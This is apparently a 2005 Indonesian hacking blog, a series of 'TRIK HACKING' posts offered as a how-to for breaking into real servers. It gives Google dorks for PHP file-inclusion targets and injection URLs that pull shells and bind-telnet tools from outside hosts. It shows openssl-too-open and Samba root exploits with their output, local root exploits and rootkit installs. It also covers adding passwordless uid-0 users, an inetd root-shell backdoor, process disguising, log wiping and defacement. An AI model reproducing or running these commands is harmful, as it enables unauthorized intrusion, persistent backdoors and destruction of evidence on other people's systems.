'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?page=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?link=*".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?link=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword "allinurl:*.php?file=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?file=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd "
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd "
3.eksekusi file httpd tadi :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd "
4. buka telnet ke IP target sesuai dg port bindttynya

II. install Cgi-telnet
1.buat url seperti ini :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl "
url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.
2. buat cgi-telnet test.pl jadi file eksekusi :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl "
3. akses cgitelnet kita dengan membuka url :
" http://www.target.com/cgi-bin/test.pl "
masukkan passwordnya "n0fr13"

III. install shell php
1. buat url seperti ini :
"http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php "
url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita.
2. akses shell php kita sesuai dengan foldernya :
" http://www.target.com/target/log.php "

IV. Deface
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo "K-159 and crew was touch your system" > test.html

thats all my friends. just try it !!!

TRIK 8 HACKING

2005-02-25T19:58:00.000+07:00

=======
VHOST

= edit di httpd.conf
= tinggal tambah no
= kong di named.conf
= 1. wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz
= 2. tar zxvf apache_1.3.27.tar.gz
= 3. cd apache_1.3.27
= 4. ./configure
= 5. make
= 6. make install
= 7. /usr/local/apache/bin/apachectl start
= cd /usr/local/apache/conf/httpd.conf
= contoh
= echo "" > httpd.conf
= echo "ServerName www.Cmaster4.net" > httpd.conf
= echo "DocumentRoot /home/iptek/public_html" > httpd.conf
= echo "ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin" > httpd.conf
= echo "" >> httpd.conf
= ------------------------------
= ------------------------------
= ------------------------------
= find |grep name.conf
= echo "zone "i-am.Cmaster4.net" IN {" > named.conf
= echo "type master; > named.conf
= echo "file "/var/named/named.local";" > named.conf
= echo "allow-update { none; };" > named.conf
= echo "};" >> named.conf
= nah setelah itu kamu restart named dan httpd nya
= /etc/init.d/named stop
= /etc/init.d/named start
= /etc/init.d/httpd stop
= /etc/init.d/httpd start
= atau
= /etc/rc.d/init.d/named stop
= /etc/rc.d/init.d/named start
= /etc/rc.d/init.d/httpd stop
= /etc/rc.d/init.d/httpd start
= atau kalau bukan di /etc/init.d/ coba ketik find |grep named dan berikutnya find |grep httpd
=================================================================
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make; wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh; wget http://www.geocities.com/lifron/kik; chmod +x kik; ./kik "/usr/sbin/httpd -DHAVE_PROXY -DHAVE" ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz
====================
EGGDROP
====================
= wget www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget www.geocities.com/lifron/bot.conf; cd scripts; wget www.geocities.com/lifron/netgate.tcl; cd ..
= ./eggdrop -mnt bot.conf
./eggdrop -m bot.conf
==============
My_eGallery from K-159
==============
1.pasangin bindtty
2. kalo ggk jalan bindtty nya pasangin shell.php
3.kalo ggk jalan juga coba cgi-telnet
contohnya
http://livron.port5.com/mail.php <---------ini source shell
misalnya:
http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php
kalo gak bisa kita cari folder yg bisa buat id wwrun utk wget
kalo bisa... buka:
http://www.target.org/modules/My_eGallery/public/mail.php
========
pasang bindtty
wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
============
cgi-telnet
mencari folder cgi-binnya >> disitulah kita Taro cgi-telnetnya
biasanya folder cgi-bin ada di folder .../www
tp kebanyakan webserver
tiap user di beri folder cgi-bin masing2
contoh:
/home/users/russisk/html/modules/My_eGallery/public <------td kan kita ada di folder ini
http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=ls%20-al%20/home/users/russisk
kliatan cgi-bin-nya
cd ke folder cgi-bin baru wget ke situ
Contoh:
wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl
kalo bisa lanjut ke
chmod 755 /home/users/russisk/cgi-bin/cgi.pl <-------agar file cgi.pl nya jd file eksekusi
kalo bisa tinggal buka:
www.target.org/cgi-bin/cgi.pl port 7788
============ end
wget www.geocities.com/lifron/psy.tar.gz;
tar -zvxf psy.tar.gz
cd .psy
./config KuNTuA 6669
./fuck
./run
===========

TRIK 7 HACKING

2005-02-25T19:57:00.000+07:00

Usage: ./sambal [-bBcCdfprsStv] [host]

-b bruteforce (0 = Linux, 111 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B bruteforce steps (defaulllt = 300)
-c connectback ip address
-C max childs for scan/bruttteforce mode (default = 40)
-d bruteforce/scanmode delaaay in micro seconds (default = 100000)
-f force
-p port to attack (default = 139)
-r return address
-s scan mode (random)
-S scan mode
-t presets (0 for a list)
-v verbose mode
CONTOH:
[esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Scan mode.
+ [192.168.0.3] Samba
+ [192.168.0.10] Windows
+ [192.168.0.35] Windows
+ [192.168.0.36] Windows
+ [192.168.0.37] Windows
...
+ [192.168.0.133] Samba

./sambal -b 0 -v

===========
Usage: ./mayday-linux -t [-pa]
-t target The host to attack.
-a password Default password is "chaaangeme".
-p port Default port is 8001.
================
/usr/sbin/adduser httpd
passwd httpd

============
PACTH SAMBA
= root@redeye samba]# /etc/init.d/smb stop
= Shutting down SMB services: [ OK ]
= Shutting down NMB services: [ OK ]
= [root@redeye root]# cd /etc/samba
= [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs
= [root@redeye samba]# /etc/init.d/smb start
=======================
=======

TRIK 6 HACKING

2005-02-25T19:56:00.000+07:00

-----------------
Patch Your Root
-----------------
wget http://www.geocities.com/lifron/patch.tar.gz
tar -zxvf patch.tar.gz
cd patch
./sexy

BERSIH JEJAK:manual
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
==================================
LOCAL ROOT
http://www.geocities.com/lifron/local.tar.gz

2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz
cd local
chmod 755 *
./local.sh
./lconfex -p
./lconfex -f
sh ./handy.sh 0xbffffb24 0xbffff661

-------------------
Add user dlm Root:
-------------------
1.
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua
passwd -d kuntua

/usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes
passwd -d moes

/usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes
passwd -d cakmoes

2.
/usr/sbin/adduser jabriks -g root -d /var/jabriks
passwd -d jabriks

/usr/sbin/adduser mus -g root -d /var/mus
passwd -d mus

/usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano
passwd tondano75
----------------------------
**add user accses root
----------------------------
/usr/sbin/useradd bash -g root -u 0 -d /
passwd -d tondano

/usr/sbin/useradd jabrik -g root -u 0 -d /
passwd -d jabrik

/usr/sbin/useradd cakmoes -g root -u 0 -d /
passwd -d cakmoes
-----------
Del User
-----------
/usr/sbin/userdel -r [namauser]
PENTING
kalo so dapat ROOT
ketik id
uname -a
abis itu
ketik cd /tmp
-----------------
--------------------------------------------
ngeROOT ssh LINUX port 22:

wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210

--------------------------------------------
wget www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <--- scan massal SSH
./r00t 203.20 -d 2 <--- scan massal FTP
./r00t 203.20 -d 3 <--- scan massal FTP

./r00t 134.7. -d 4
--------------------------------------------
ngeROOT utk OS SCO :
wget www.renjana.com/sco
./sco IP

--------------------------------------------

pasang BackDoor:
1.

id
uname -a
cd /tmp
wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz
ls -al
tar -zxvf tk.tgz
cd tk
./t0rn kuntua 7000

--------------------------------------------

TRIK 5 HACIKNG

2005-02-25T19:54:00.000+07:00

=================================================================================================
wget http://brutalside.host.sk/tools/term
chmod +x term
./term lonthe123
=================================================================================================
wget http://brutalside.host.sk/tools/ftp.tgz
gunzip ftp.tgz
gzip ftp.tar
tar -zxvf ftp.tar.gz
cd ftp
./scan 163 22 10
./scan 163 22 10 163
=================================================================================================
scan port dgn pscan.c ==> www.packetstormsecurity.nl
bila port:23 vurnerable bisa running exploit
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
=================================================================================================
http://brutalside.host.sk/tools/kik
chmod +x kik
./kik "-bash" ./psybnc
=================================================================================================

=================================================================================================
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
===================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Sampai disini kita selesai dengan permainan di server target root
Sekarang kita kembali ke user dan ketik :
./sh
nah, apa yg terjadi setelah kita jalankan command ./sh...?
yg terjadi adalah uid dan gid kita adalah 0 :)
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
./psybnc psybnc.conf
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc "syslogd "
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
mv psybnc.conf " " ; pwd
PATH=$PATH:/var/tmp/" "/.log/
"syslogd " " "
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
=================================================================================================
+Command Mapache2x
- ./mapache RangeIP (mis: ./mapache 200 443 10 10) << Scan
- ./apache IPTarget (Mis: ./apache 202.11159.67.176)
==================================
+Command MassApache
- ./massossl RangeIP (mis: ./massossl 22200 443 10 10) << Scan
- ./osslx -a 0x0b -v IPTarget (Mis: ./ooosslx -a 0x0b -v 202.159.67.176)
================================================
+FTP Command 4 RooT

- ./scan No Depan IP Target (Mis: ./scannn 210 21 10)

=addUser=
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow

adduser? ketik /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua enter,
buat password ketik passwd kuntua enter ,
abis itu ketik tondano tekan enter abis itu ketik lagi tondano , nb: ketik tondano dua kali itu kegunaan nya buat password kita

Changing password for user ganjen
passwd: all authentication tokens updated successfully

berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah..

kalo mau dapet acces root ketik :

/usr/sbin/useradd bash -u 0 -d /

abis itu ketik lagi

passwd -d bash

apus jejak
cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog

udah di ketik semua ? udahh... tekan ctrl d .
=================================
+Backdoor
NEWCOMER FREZZ BackDooR
- wget manadocarding.info/charles; chmod 755 charles; ./charles
= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root
- wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000
= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000

***** ADD USER SHELL *****
/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon
passwd -d yrfon

TRIK 4 HACKING

2005-02-25T19:53:00.000+07:00

=================================================================================================
OPENSSL-TOO-OPEN
=================================================================================================
./openssl -a 0x15 -v 61.220.53.91
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse

: Opening 30 connections
Establishing SSL connections

-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0x80e1638

: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0x80e1638 start_addr: 0x80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
=================================================================================================
: MARI KITA MAINKAN ROOTNYA :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir ... ; cd ....
wget www.geocities.com/lifron/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1

GOT IT! Your magic number is : 792
Now create a dir 'segfault.eng' and touch a file named 'segfault.eng' in it.
Then exec "./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792" to get rootshell

*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1

Good Luck d0inks!

mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
=================================================================================================
/usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo "apache::0:0::/mails:/bin/bash" >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
login ke shell
last | grep mails
su apache
mkdir /var/tmp/" "
cd /var/tmp/" "
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/" " <== del semua tools
test shell with port 7788 and password 35b4tud1n91n
=================================================================================================
[Langkah Hapus Log I]
=================================================================================================
export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0
=================================================================================================
[Langkah Hapus Log I]
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================

TRIK 3 HACKING

2005-02-25T19:51:00.000+07:00

=================================================================================================
1. wget www.geocities.com/lifron/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
./ssl 204.145.119.253
=================================================================================================
1. wget www.geocities.com/lifron/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
=================================================================================================
1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
./openssl-too-open -a 0x15 -v 212.70.224.129
=================================================================================================
1. wget www.geocities.com/lifron/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
./setup 7788 35b4tu
=================================================================================================
1. wget http://www.geocities.com/lifron/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
./massplo 210.10 -d 8
=================================================================================================
1. wget www.geocities.com/lifron/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4. ./apache 208.134.131.49
./massossl 80 443 13
./mapache 443 210.10
=================================================================================================
1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
=================================================================================================
1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning
./sambal -d 0 -C 60 -S IP | grep samba
./sambal -b 0 -v IP <=== attack
=================================================================================================
SecureCRT: http://www.vandyke.com/
TTSSH: http://www.zip.com.au/~roca/ttssh.html
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html
SecureShell: http://public.srce.hr/~cigaly/ssh/
=================================================================================================
DEFACE
=================================================================================================
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "KuNTuA Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo "KuNTuA Was Here" > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
=================================================================================================
Install WGET
=================================================================================================
1. coba ketik: cat /etc/issue, untuk melihat Sistem Operasinya
2. ketik: ftp ftp.rpmfind.net
3. login : anonymous
4. cd linux/redhat/updates/7.0/en/os/
5. cd i386
6. get wget-1.8.2-4.70.i386.rpm
7. quit dari ftp
8. Proses Peng-Instalan
rpm -ivh wget-1.8.2-4.70.i386.rpm
http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+...&system=redhat&arch=
=================================================================================================
wget http://202.158.16.157/ssh.diff
wget http://www.geocities.com/lifron/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.5p1.tar.gz
cp ssh.diff openssh-3.5p1.tar.gz
cd openssh-3.5p1
patch -p < ssh.diff
./configure
make ssh
./ssh -l root
./ssh -l root 66.136.37.101
./ssh -l root 66.149.178.214
=================================================================================================
: COMMAND ADDUSER :
=================================================================================================
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/kuntua
/usr/sbin/useradd tondano -u 0 -d /
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
passwd -d tondano
Changing password for user tondano
Removing password for user tondano
passwd: Success
=================================================================================================
passwd kuntua
New UNIX password: kuntua75
Retype new UNIX password: kuntua75
Changing password for user kuntua
passwd: all authentication tokens updated successfully
password tondano
New UNIX password: kuntua75
Retype new UNIX password: kuntua75
Changing password for user tondano
passwd: all authentication tokens updated successfully
=================================================================================================

TRIK 2 HACKING

2005-02-25T19:49:00.000+07:00

=================================================================================================
BIKIN BACKDOOR
=================================================================================================
echo "kuntua 1979/tcp" >> /etc/services
echo "dial stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf kill -HUP 135
telnet dengan port "1979"
=================================================================================================
http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
http://www.rocketpunch-ent.com/lucstatdx.c
=================================================================================================
[root@gila /]#rpm -qa | grep samba

samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36

[root@gila /]# arp -n

Address HWtype HWaddress Flags Mask Iface
192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1
192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1
192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1
192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1
192.168.0.3 ether 00:10:5A:71:17:E3 C eth1
192.168.0.1 ether 00:00:21:28:8C:47 C eth1

[root@gila /]# nmblookup -d2 '*' #untuk mendeteksi netbios

Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )

[root@gila /]# locate findsmb
/usr/bin/findsmb

[root@router /]# findsmb

IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
-----------------------------------------
192.168.0.1 CYBER1 [CYBER]
192.168.0.2 CYBER2 [CYBER]
192.168.0.3 CYBER3 [CYBER]
192.168.0.4 CYBER4 [CYBER]
192.168.0.5 CYBER5 [CYBER]

[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
Sharename Type Comment
--------- ---- -------
A Disk
C Disk
D Disk
E Disk
IPC$ IPC Remote Inter Process Communication

[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/

[root@router samba]# ls
ffastun.ffa ffastun.ffo install RECYCLED
ffastun0.ffx ffastun.ffl film win98

[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
=================================================================================================
bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
=================================================================================================
gcc sco-pop.c -o sco-pop
./sco-pop www.target.com
/var/adm
=================================================================================================
: BERSIHKAN LOG :
=================================================================================================
ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
=================================================================================================
securityfocus.com|rstcorp.com/its4|striker.ottawa.on.ca/~aland/pscan|securiteam.com|www.l0pht.com|insecure.org|rhino9.ml.org|technotronic.com|nmrc.org|cultdeadcow.com|kevinmitnick.com|2600.com|antionline.com|rootshell.com|aol.com|happyhacker.org|lwn.net|slashdot.org|netric.org
=================================================================================================
repsec.com|iss.net|checkpoint.com|infowar.com|
=================================================================================================
li.org|redhat.com|debian.org|linux.org|www.sgi.com|netbsd.org|openbsd.org|linuxtoday.com|freebsd.org|slackware.com|mandrake.com|linuxguruz.org
=================================================================================================
harvard.edu|yale.edu|caltech.edu|stanford.edu|mit.edu|berkeley.edu|oxford.edu|whitehouse.gov|sunsite.unc.edu|
=================================================================================================
http://channels.dal.net/netgate/psybnc2.3.tar.gz|geocities.com/logic_roncep|irc.netsplit.de/networks/DALnet/current.var|psychoid.lam3rz.de/psyBNC2.3.tar.gz|shellcentral.com/downloads/files/psyBNC2.3.1.tar.gz|seputarmalang.com/kayutangan.php|community.core-sdi.com/~juliano|packetstormsecurity.org/0212-exploits/telnetjuarez.c|packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz|maskedteam.com/exploit/local.tar.gz|http://ftp.linux.hr/pub/openssh/openssh-2.1.1p4.tar.gz|wget http://www.pupet.net/fiona/sslpupet.tar.gz|
=================================================================================================

TRIK 1 HACKING

2005-02-25T19:47:00.000+07:00

autor : kawan - kawanku

: TRIK MEMBUAT PSYBNC :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd var/tmp/ ; mkdir .... ; cd .... ;
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz;
mv Pre-psyBNC.tgz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make; mv psybnc "bash " ; rm psybnc.conf ;
wget http://www.geocities.com/lifron/psybnc.conf.20075.txt ; mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt " " ; pwd ; PATH=$PATH:/var/tmp/..../.log/ ; "bash " " "
mv psybnc.pid .log ;
mv ./psybncchk .sh ;
mv ./log/psybnc.log .mud ;
find |grep psybnc
=================================================================================================
: TRIK MENGHAPUS LOG :
=================================================================================================
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
: LOCAL ROOT MANDRAKE :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir " " ; cd " "
1. wget www.geocities.com/lifron/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
